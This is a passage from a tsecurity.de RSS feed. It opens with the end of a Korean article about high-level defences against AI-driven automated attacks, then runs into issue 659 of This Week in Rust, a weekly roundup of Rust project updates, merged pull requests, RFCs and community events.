<p>AI 시대 활용할 수 있는 기술적인 대응 방향도 소개했다. 박 대표는 사람과 AI 공격자의 행동 패턴 차이를 분석해 자동화 공격을 탐지하는 방식, AI 공격자에게 의도적으로 계산 부하를 부과해 공격 속도를 늦추는 PoW(Proof of Work) 챌린지 방식 등을 새로운 방어 기법으로 제시했다. 마우스 움직임과 키보드 입력, 스크롤 패턴 등을 분석해 비정상 접근을 걸러내는 것이 대표적이다. 그는 “공격을 100% 차단하는 것보다 일부라도 걸러내 보안팀의 부담을 줄이는 것이 현실적인 전략”이라고 말했다.</p>



<p>발표를 마무리하며 그는 AI 시대에도 기술만으로는 보안을 완성할 수 없다고 강조했다. 박 대표는 “AI로 넓고 빠르게 위협을 살펴볼 수는 있지만, 결국 검증하고 확인하는 것은 사람의 몫”이라며 “사람은 아직도 중요하다”고 말했다.</p>



<p>한편 박찬암 대표는 10대 시절부터 국내외 해킹 대회에서 입상하며 화이트해커로 이름을 알렸으며, 경찰청 등 정부 기관의 사이버보안 자문을 맡아왔다. 현재는 보안 기업 <a href="https://stealien.com/company" target="_blank" rel="nofollow">스틸리언</a>의 대표이사를 맡고 있다.<br>jihyun.lee@foundryco.com</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[This Week In Rust: This Week in Rust 659]]></title>
<description><![CDATA[Hello and welcome to another issue of This Week in Rust!
Rust is a programming language empowering everyone to build reliable and efficient software.
This is a weekly summary of its progress and community.
Want something mentioned? Tag us at
@thisweekinrust.bsky.social on Bluesky or
@ThisWeekinRu...]]></description>
<link>https://tsecurity.de/de/3656000/tools/this-week-in-rust-this-week-in-rust-659/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3656000/tools/this-week-in-rust-this-week-in-rust-659/</guid>
<pubDate>Thu, 09 Jul 2026 07:08:34 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Hello and welcome to another issue of <em>This Week in Rust</em>!
<a href="https://www.rust-lang.org/">Rust</a> is a programming language empowering everyone to build reliable and efficient software.
This is a weekly summary of its progress and community.
Want something mentioned? Tag us at
<a href="https://bsky.app/profile/thisweekinrust.bsky.social">@thisweekinrust.bsky.social</a> on Bluesky or
<a href="https://mastodon.social/@thisweekinrust">@ThisWeekinRust</a> on mastodon.social, or
<a href="https://github.com/rust-lang/this-week-in-rust">send us a pull request</a>.
Want to get involved? <a href="https://github.com/rust-lang/rust/blob/main/CONTRIBUTING.md">We love contributions</a>.</p>
<p><em>This Week in Rust</em> is openly developed <a href="https://github.com/rust-lang/this-week-in-rust">on GitHub</a> and archives can be viewed at <a href="https://this-week-in-rust.org/">this-week-in-rust.org</a>.
If you find any errors in this week's issue, <a href="https://github.com/rust-lang/this-week-in-rust/pulls">please submit a PR</a>.</p>
<p>Want TWIR in your inbox? <a href="https://this-week-in-rust.us11.list-manage.com/subscribe?u=fd84c1c757e02889a9b08d289&amp;id=0ed8b72485">Subscribe here</a>.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#updates-from-rust-community">Updates from Rust Community</a></h4>


<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#official">Official</a></h5>
<ul>
<li><a href="https://blog.rust-lang.org/inside-rust/2026/07/07/maintainer-spotlight-gen-li-rami3l/">Maintainer spotlight: Gen Li (@rami3l)</a></li>
<li><a href="https://blog.rust-lang.org/inside-rust/2026/07/06/unite-for-clippy/">Together for a healthier Clippy</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#newsletters">Newsletters</a></h5>
<ul>
<li><a href="https://www.theembeddedrustacean.com/p/the-embedded-rustacean-issue-75">The Embedded Rustacean Issue #75</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#projecttooling-updates">Project/Tooling Updates</a></h5>
<ul>
<li><a href="https://www.copper-robotics.com/whats-new/copper-rs-v100">copper-rs v1.0.0</a>: the open source deterministic robotics OS is now stable.</li>
<li><a href="https://rayfish.xyz/blog/01-introducing-rayfish">Rayfish: Your own private network. No servers, no setup.</a></li>
<li><a href="https://plabayo.tech/blog/rama-0-3">rama v0.3.0 — network service framework ready to be used by the wider Rust community</a></li>
<li><a href="https://github.com/kunobi-ninja/kache/releases/tag/v0.9.0">kache 0.9.0: supply-chain hardening + read-only CI cache</a></li>
<li><a href="https://www.willsearch.com.br/blog/2026/07/04/meet-guardiandbs-new-postgresql-compatibility-layer/">GuardianDB - PostgreSQL and P2P/Local-First Together</a></li>
<li><a href="https://buildnectar.com/">Nectar: a Rust-like language that compiles your whole web app to WebAssembly</a></li>
<li><a href="https://thekeeper.io/blog/logdrain-log-template-mining-in-rust/">logdrain: Fast, Embeddable Log-Template Mining in Rust</a></li>
<li><a href="https://medium.com/@vbasky/packaging-the-worlds-video-in-pure-rust-ff1f6b884fec">sheathe: Packaging the World's Video in Pure Rust</a></li>
<li><a href="https://docs.wickra.org/Quickstart-Rust">wickra: streaming-first technical indicators</a></li>
<li><a href="https://github.com/TeamXcelerator/xcelerator-solver/releases/tag/v0.1.0">Xcelerator Solver v0.1.0 -- deterministic symbolic regression</a></li>
<li><a href="https://github.com/tkmsikd/dlt-tui/releases/tag/v1.1.0">dlt-tui 1.1.0 - a fast TUI viewer for automotive DLT (AUTOSAR Diagnostic Log and Trace) files</a></li>
<li><a href="https://github.com/shihuili1218/rssh/releases/tag/v0.2.11">RSSH v0.2.11 — terminal workflows, safer SSH key import, and observable AI ops</a></li>
<li><a href="https://blog.none.at/blog/2026/2026-07-06-k8s-scale-app-rs/">k8s-scale-app-rs: Scale or Restart a Kubernetes Deployment from a CronJob</a></li>
<li><a href="https://dev.to/sicklefire/m-vis-v050-rc1-update-11cp">M-vis v0.5.0-rc1 update</a></li>
<li><a href="https://ganeshsivakumar.substack.com/p/flaredb">FlareDB: An Apache Beam Native Streaming Database built in Rust</a></li>
<li><a href="https://holovskyi.github.io/blog/typed-mqtt-topics-for-rust/">mqtt-typed-client 0.2: a type-safe async MQTT client on rumqttc</a></li>
<li><a href="https://github.com/LeChatP/RootAsRole/releases/tag/v4.0.0">RootAsRole: v4.0.0 Major release, secure execution, new logo</a></li>
<li><a href="https://www.qt.io/blog/rust-ui-framework-via-bridging-technology">A Cross-Platform Rust UI Framework via Qt’s Bridging Technology</a></li>
<li><a href="https://rapha.land/jam-programming-language/">Jam Programming Language</a></li>
<li><a href="https://www.clever.cloud/blog/company/2026/07/01/sozu-2-1-0-udp-load-balancer-programmable-edge/">Sōzu 2.1.0: UDP load balancing for the programmable edge</a></li>
<li><a href="https://op3kay.dev/writing/b0nker">b0nker: a minimal container runtime written in Rust</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#observationsthoughts">Observations/Thoughts</a></h5>
<ul>
<li>[video] <a href="https://www.youtube.com/watch?v=SGR5qBdwk30">Rust Berlin Meetup 25/06/2026 Livestream</a></li>
<li>[video] <a href="https://www.youtube.com/live/_LtgHxuysUo">How do you rewrite C/C++ projects to Rust? – JetBrains interview with Luca Palmieri, Mainmatter</a></li>
<li><a href="https://kerkour.com/rustcrypto-slow-simd-rust">Investigating why RustCrypto is slow: Deep dive into SIMD instructions and hardware acceleration</a></li>
<li><a href="https://parsa.wtf/cast/">bool as u32</a></li>
<li><a href="https://arxiv.org/html/2605.30106">A Rust-to-Lean Verification Pipeline with AI Provers: An Experience Report</a></li>
<li><a href="https://blog.dureuill.net/articles/wip/">Work In Progress Rust</a></li>
<li>[video] <a href="https://www.youtube.com/watch?v=Fk165jYfHpc">OpenAI just spent $600k on Rust</a></li>
<li>[audio] <a href="https://corrode.dev/podcast/s06e07-rising-academies/">Rising Academies with Dylan Brown - Rust in Production Podcast</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-walkthroughs">Rust Walkthroughs</a></h5>
<ul>
<li>[series] <a href="https://aibodh.com/posts/bevy-tutorial-build-your-first-3d-editor-in-rust/">Bevy Tutorial: Build Your First 3D Editor - Create a 3D Space on an Infinite Grid</a></li>
<li><a href="https://blog.sheerluck.dev/posts/learn-axum-basics-and-routing-by-building-a-url-shortener/">Learn Axum Basics and Routing by Building a URL Shortener</a></li>
<li>[series] <a href="https://plabayo.tech/blog/rama-101-1-https-clients-and-abstractions">Rama 101.1: HTTPS clients and layers of abstraction</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#miscellaneous">Miscellaneous</a></h5>
<ul>
<li><a href="https://seanborg.tech/tiny-blog/rust-week-ven-diagram/">Clickable euler diagram of all the Rust week talks</a></li>
</ul>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#crate-of-the-week">Crate of the Week</a></h4>
<p>This week's crate is <a href="https://crates.io/crates/apis-saltans-core">apis-saltans</a>, a Zigbee implementation including a coordinator API.</p>
<p>Thanks to <a href="https://users.rust-lang.org/t/crate-of-the-week/2704/1627">Richard Neumann</a> for the self-suggestion!</p>
<p><a href="https://users.rust-lang.org/t/crate-of-the-week/2704">Please submit your suggestions and votes for next week</a>!</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#calls-for-testing">Calls for Testing</a></h4>
<p>An important step for RFC implementation is for people to experiment with the
implementation and give feedback, especially before stabilization.</p>
<p>If you are a feature implementer and would like your RFC to appear in this list, add a
<code>call-for-testing</code> label to your RFC along with a comment providing testing instructions and/or
guidance on which aspect(s) of the feature need testing.</p>
<p><em>No calls for testing were issued this week by
<a href="https://github.com/rust-lang/rust/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Rust</a>,
<a href="https://github.com/rust-lang/cargo/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Cargo</a>,
<a href="https://github.com/rust-lang/rustup/issues?q=state%3Aopen%20label%3Acall-for-testing%20state%3Aopen">Rustup</a> or
<a href="https://github.com/rust-lang/rfcs/issues?q=label%3Acall-for-testing%20state%3Aopen">Rust language RFCs</a>.</em></p>
<p><a href="https://github.com/rust-lang/this-week-in-rust/issues">Let us know</a> if you would like your feature to be tracked as a part of this list.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#call-for-participation-projects-and-speakers">Call for Participation; projects and speakers</a></h4>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cfp-projects">CFP - Projects</a></h5>
<p>Always wanted to contribute to open-source projects but did not know where to start?
Every week we highlight some tasks from the Rust community for you to pick and get started!</p>
<p>Some of these tasks may also have mentors available, visit the task page for more information.</p>

<p>* <a href="https://github.com/name970/Protocol/issues/4">Protocol - Extend bit-exactness tests to f64 reconstruction targets</a>                                                                          <br>
* <a href="https://github.com/lenra-io/dofigen/issues/278">Dofigen - No image tag replacement flag for the generate command</a></p>


<p>If you are a Rust project owner and are looking for contributors, please submit tasks <a href="https://github.com/rust-lang/this-week-in-rust?tab=readme-ov-file#call-for-participation-guidelines">here</a> or through a <a href="https://github.com/rust-lang/this-week-in-rust">PR to TWiR</a> or by reaching out on <a href="https://bsky.app/profile/thisweekinrust.bsky.social">Bluesky</a> or <a href="https://mastodon.social/@thisweekinrust">Mastodon</a>!</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cfp-events">CFP - Events</a></h5>
<p>Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.</p>



<p>If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a <a href="https://github.com/rust-lang/this-week-in-rust">PR to TWiR</a> or by reaching out on <a href="https://bsky.app/profile/thisweekinrust.bsky.social">Bluesky</a> or <a href="https://mastodon.social/@thisweekinrust">Mastodon</a>!</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#updates-from-the-rust-project">Updates from the Rust Project</a></h4>
<p>598 pull requests were <a href="https://github.com/search?q=is%3Apr+org%3Arust-lang+is%3Amerged+merged%3A2026-06-30..2026-07-07">merged in the last week</a></p>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#compiler">Compiler</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/156976">enable eager <code>param_env</code> norm in new solver</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/156379">lint on <code>core::ffi::c_void</code> as a return type</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158577">polish some macro parsing code</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158604">resolve: no allocation in <code>resolve_ident_in(_local)_module_*</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158627">simplify option-iterator flattening in the compiler</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157857">stabilize <code>#[my_macro] mod foo;</code> (part of <code>proc_macro_hygiene</code>)</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#library">Library</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/158537">add <code>std::io::cursor::WriteThroughCursor</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157347">implement <code>Box::as_non_null()</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/156737">implement <code>DoubleEndedIterator::next_chunk_back</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/134021">implement <code>IntoIterator</code> for <code>[&amp;[mut]] Box&lt;[T; N], A&gt;</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158427">implement <code>ptr::{read,write}_unaligned</code> via <code>repr(packed)</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158539">move <code>SizeHint</code> and <code>IoHandle</code> to <code>core::io</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158540">move <code>std::io::Seek</code> to <code>core::io</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158704">optimize <code>ArrayChunks::try_rfold</code> with <code>DoubleEndedIterator::next_chunk_back</code></a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158573">stabilize <code>feature(atomic_from_mut)</code></a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#cargo">Cargo</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/cargo/pull/17135"><code>bindeps</code>: register transitive artifact targets</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17167">avoid cloning parsed TOML manifest in <code>ManifestErrorContext</code></a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17176">avoid extra clone of parsed TOML manifest</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17178">remove unneeded cloning when parsing package index</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17169">change HashMaps and HashSets in Cargo to use Fxhasher</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17174">do not pass lint rustflags when <code>--cap-lints=allow</code> is set</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17164">fixed <code>Compilation::deps_output</code> only taking the last dep</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17177">pre-allocate a few vectors</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/16807">stabilize <code>build-dir</code> layout v2</a></li>
<li><a href="https://github.com/rust-lang/cargo/pull/17180">use a set when checking visited workspace members</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rustdoc">Rustdoc</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/158751">fix crash when trying to inline foreign item which cannot have attributes</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158334">show use-site paths for unevaluated const array lengths</a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#clippy">Clippy</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17319"><code>chunks_exact_to_as_chunks</code>: Don't report expressions with const parameters</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17360"><code>chunks_exact_to_as_chunks</code>: Don't report expressions with type params</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17309"><code>missing_trait_methods</code>: MSRV/unstable awareness</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17289"><code>vec_init_then_push</code>: don't lint pushes from a macro expansion</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17346"><code>inline_modules</code>: ignore <code>cfg(test)</code> modules in test builds</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17345"><code>match_same_arms</code>: keep arm-level expectations working under an outer allow</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17341"><code>unnecessary_operation</code>: avoid bad <code>!</code> suggestions</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17351"><code>unnecessary_unwrap_unchecked</code>: don't trigger inside the <code>_unchecked</code> fn</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17348">add required parentheses when the <code>needless_bool</code> suggestion is an operand</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17353">fix ICE when resolving local in <code>unnecessary_unwrap_unchecked</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17311">fix <code>infinite_loop</code> false positive inside gen blocks</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17358">fix <code>manual_c_str_literals</code> suggestion when the trailing backslash is escaped</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17337">fix <code>strlen_on_c_strings</code> incorrect suggestion logic</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17323">fix <code>suspicious_operation_groupings</code> duplications</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/16902">lint bit width</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17338">optimize <code>Msrv::meets</code> calls</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17273">bail out of unicode lint scans when the snippet is pure ASCII</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17224">skip the HIR parent walk in <code>is_in_test_function</code> when there are no test items</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17366">place generated impl block after the existing impl block</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17333">refactor <code>StringAdd</code> lint pass</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17334">refactor <code>suspicious_xor_used_as_pow</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17293">remove <code>lower_ty</code> in <code>uninhabited_reference</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17328">respect the configured MSRV in <code>manual_is_variant_and</code>'s <code>map() == Some(_)</code> rewrite</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17332">rewrite <code>mut_mut</code></a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17329">rewrite <code>redundant_else</code> as a late pass</a></li>
<li><a href="https://github.com/rust-lang/rust-clippy/pull/17354">rewrite <code>tuple_array_conversions</code></a></li>
</ul>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-analyzer">Rust-Analyzer</a></h6>
<ul>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22595">SCIP: exclude leading/trailing trivia in definition ranges</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22708">SCIP: remove dead <code>inlay_hints</code> field</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22433"><code>feat(ide-diagnostics)</code>: add diagnostics for invalid union patterns (E0784)</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22704"><code>internal(query-group-macro)</code>: remove the arity test</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22668">add tree top method to Syntax node</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22665">add handler for E0627</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22231">supports multi arms for <code>replace_match_with_if_let</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22690">fix UB in <code>smol_str borsh_non_utf8</code> test cases</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/20362">fix generic param for <code>generate_default_from_enum_variant</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22703"><code>walkthrough_create_project</code> file not packaged</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22677">assertion failure on closure with unbound function</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22613">avoid panic in <code>convert_tuple_struct_to_named_struct</code> on nested pattern usage</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22649">configuration syntax for nvim-lsp</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22706">correct resolution to value when it shares the same name with type</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22619">exclude impls on the error type from impl enumeration</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22705">fix crash on <code>extract_variable</code> when selecting unresolved macro call</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22715">fix crash on completion inside macros</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22673">fix handling of params of coroutine fns</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22675">handle more cases of cfgs in expr store lowering</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22488">no generate with default assoc item</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22674">panics in <code>unwrap_return_type</code>, <code>remove_underscore</code>, and <code>promote_local_to_const</code></a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22711">hoist attribute qualifier segment collection</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22709">reduce parser joint-token allocation</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22676">project-model: don't pass metadata extra args to sysroot</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22679">project-model: introduce cargo.configPath</a></li>
<li><a href="https://github.com/rust-lang/rust-analyzer/pull/22581">provide startup time to ready log point and associated benchmark</a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust-compiler-performance-triage">Rust Compiler Performance Triage</a></h5>
<p>This week was dominated by wild swings in benchmarks of the new-solver, which is not enabled by default, yet.
Apart from that, we got a very few notable changes, only one unexpected speedup from a bugfix in rustdoc.</p>
<p>Triage done by <strong>@panstromek</strong>.
Revision range: <a href="https://perf.rust-lang.org/?start=7dc2c162b9c197aaa76a6f9e7534569537830a01&amp;end=3659db0d3e2cd634c766fcda79ed118eca31a9fd&amp;absolute=false&amp;stat=instructions%3Au">7dc2c162..3659db0d</a></p>
<p><strong>Summary</strong>:</p>
<table>
<thead>
<tr>
<th>(instructions:u)</th>
<th>mean</th>
<th>range</th>
<th>count</th>
</tr>
</thead>
<tbody>
<tr>
<td>Regressions ❌ <br> (primary)</td>
<td>0.2%</td>
<td>[0.2%, 0.2%]</td>
<td>3</td>
</tr>
<tr>
<td>Regressions ❌ <br> (secondary)</td>
<td>162.1%</td>
<td>[0.2%, 1116.3%]</td>
<td>20</td>
</tr>
<tr>
<td>Improvements ✅ <br> (primary)</td>
<td>-1.4%</td>
<td>[-8.4%, -0.1%]</td>
<td>7</td>
</tr>
<tr>
<td>Improvements ✅ <br> (secondary)</td>
<td>-1.1%</td>
<td>[-8.4%, -0.1%]</td>
<td>11</td>
</tr>
<tr>
<td>All ❌✅ (primary)</td>
<td>-0.9%</td>
<td>[-8.4%, 0.2%]</td>
<td>10</td>
</tr>
</tbody>
</table>
<p>1 Regression, 1 Improvement, 4 Mixed; 3 of them in rollups
17 artifact comparisons made in total</p>
<p><a href="https://github.com/rust-lang/rustc-perf/blob/9f1bc6e374b5ae202366df1cbef850b79be8c641/triage/2026/2026-07-06.md">Full report here</a></p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#approved-rfcs"></a><a href="https://github.com/rust-lang/rfcs/commits/master">Approved RFCs</a></h5>
<p>Changes to Rust follow the Rust <a href="https://github.com/rust-lang/rfcs#rust-rfcs">RFC (request for comments) process</a>. These
are the RFCs that were approved for implementation this week:</p>
<ul>
<li><em>No RFCs were approved this week.</em></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#final-comment-period">Final Comment Period</a></h5>
<p>Every week, <a href="https://www.rust-lang.org/team.html">the team</a> announces the 'final comment period' for RFCs and key PRs
which are reaching a decision. Express your opinions now.</p>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#tracking-issues-prs">Tracking Issues &amp; PRs</a></h6>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust"></a><a href="https://github.com/rust-lang/rust/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Rust</a>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/158522">Lint against invalid POSIX symbol definitions</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/158325">Document NonNull layout guarantees</a></li>
<li><a href="https://github.com/rust-lang/rust/issues/112811">Tracking Issue for <code>slice_split_once</code></a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#compiler-team-mcps-only"></a><a href="https://github.com/rust-lang/compiler-team/issues?q=label%3Amajor-change%20label%3Afinal-comment-period%20state%3Aopen">Compiler Team</a> <a href="https://forge.rust-lang.org/compiler/mcp.html">(MCPs only)</a>
<ul>
<li><a href="https://github.com/rust-lang/compiler-team/issues/1011">Let the OS handle stack growth</a></li>
<li><a href="https://github.com/rust-lang/compiler-team/issues/1010">Add <code>target_feature_available_at_call_site</code></a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#language-reference"></a><a href="https://github.com/rust-lang/reference/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Language Reference</a>
<ul>
<li><a href="https://github.com/rust-lang/reference/pull/2293">Empty repr(Rust) enums are ZSTs</a></li>
</ul>
<p><em>No Items entered Final Comment Period this week for
<a href="https://github.com/rust-lang/cargo/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Cargo</a>,
<a href="https://github.com/rust-lang/lang-team/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Language Team</a>,
<a href="https://github.com/rust-lang/leadership-council/issues?q=state%3Aopen%20label%3Afinal-comment-period%20state%3Aopen">Leadership Council</a>,
<a href="https://github.com/rust-lang/rfcs/issues?q=state%3Aopen%20label%3Afinal-comment-period%20state%3Aopen">Rust RFCs</a> or
<a href="https://github.com/rust-lang/unsafe-code-guidelines/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Unsafe Code Guidelines</a>.</em></p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#new-and-updated-rfcs"></a><a href="https://github.com/rust-lang/rfcs/pulls">New and Updated RFCs</a></h5>
<ul>
<li><a href="https://github.com/rust-lang/rfcs/pull/3982">Update RFC template</a></li>
<li><a href="https://github.com/rust-lang/rfcs/pull/3981">RFC: Store registry tokens in the OS credential store by default</a></li>
</ul>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#upcoming-events">Upcoming Events</a></h4>
<p>Rusty Events between 2026-07-08 - 2026-08-05 🦀</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#virtual">Virtual</a></h5>
<ul>
<li>2026-07-08 | Virtual (Cardiff, GB) | <a href="https://www.meetup.com/rust-and-c-plus-plus-in-cardiff/events/">Rust and C++ Cardiff</a></li>
<li><a href="https://www.meetup.com/rust-and-c-plus-plus-in-cardiff/events/315506435/"><strong>Operating Systems Book Club: Introduction + Processes</strong></a></li>
<li>2026-07-08 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a></li>
<li><a href="https://luma.com/jv9lom12"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
<li>2026-07-09 | Virtual (Nürnberg, DE) | <a href="https://www.meetup.com/rust-noris/events/">Rust Nuremberg</a></li>
<li><a href="https://www.meetup.com/rust-noris/events/315517604/"><strong>Rust Nürnberg online</strong></a></li>
<li>2026-07-14 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a></li>
<li><a href="https://www.meetup.com/dallasrust/events/310254778/"><strong>Second Tuesday</strong></a></li>
<li>2026-07-15 | Virtual (Girona, ES) | <a href="https://luma.com/rust-girona">Rust Girona</a></li>
<li><a href="https://luma.com/21k797xr"><strong>Sessió setmanal de codificació / Weekly coding session</strong></a></li>
<li>2026-07-15 | Hybrid (Vancouver, BC, CA) | <a href="https://www.meetup.com/vancouver-rust">Vancouver Rust</a></li>
<li><a href="https://www.meetup.com/vancouver-rust/events/314233743/"><strong>Jiff</strong></a></li>
<li>2026-07-16 | Hybrid (Seattle, WA, US) | <a href="https://www.meetup.com/join-srug">Seattle Rust User Group</a></li>
<li><a href="https://www.meetup.com/seattle-rust-user-group/events/314520812/"><strong>July, 2026 SRUG (Seattle Rust User Group) Meetup</strong></a></li>
<li>2026-07-16 | Virtual (Berlin, DE) | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a></li>
<li><a href="https://www.meetup.com/rust-berlin/events/312045926/"><strong>Rust Hack and Learn</strong></a></li>
<li>2026-07-19 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a></li>
<li><a href="https://www.meetup.com/dallasrust/events/314329045/"><strong>Rust Deep Learning: Third Sunday</strong></a></li>
<li>2026-07-21 | Virtual (London, UK) | <a href="https://www.meetup.com/women-in-rust">Women in Rust</a></li>
<li><a href="https://www.meetup.com/women-in-rust/events/315102297/"><strong>Lunch &amp; Learn: Learning Rust as First Programming Language</strong></a></li>
